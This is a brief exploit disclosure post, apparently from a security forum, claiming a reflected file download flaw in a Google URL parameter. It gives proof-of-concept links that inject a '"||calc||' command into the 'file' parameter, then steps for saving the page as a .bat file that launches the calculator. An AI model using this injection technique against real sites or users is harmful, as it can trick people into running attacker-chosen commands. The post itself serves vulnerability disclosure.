RE: reflected download execute command google.com by Hosein)root

Exploit:
[+] https://www.google.com/uds/?file=1&v=1&packages=geochart

# PoC:link
[+] https://www.google.com/uds/?file="||calc||&v=1&packages=geochart

input file= have vulnerability . first change ?file=1 to ?file=calc
#first test and load page now save page as a bat file now run bat file and see nothing

#second test we change ?file=1 to ?file=||calc|| and load page now save page as a bat file now run bat file and see nothing

#third test we change ?file=1 to ?file="||calc|| and load page now save page as a bat file now run bat file and see execute calculator with cmd
# by this message C:\Users\??\Desktop>var error = new Error("Module: '\" || calc || ' not found!");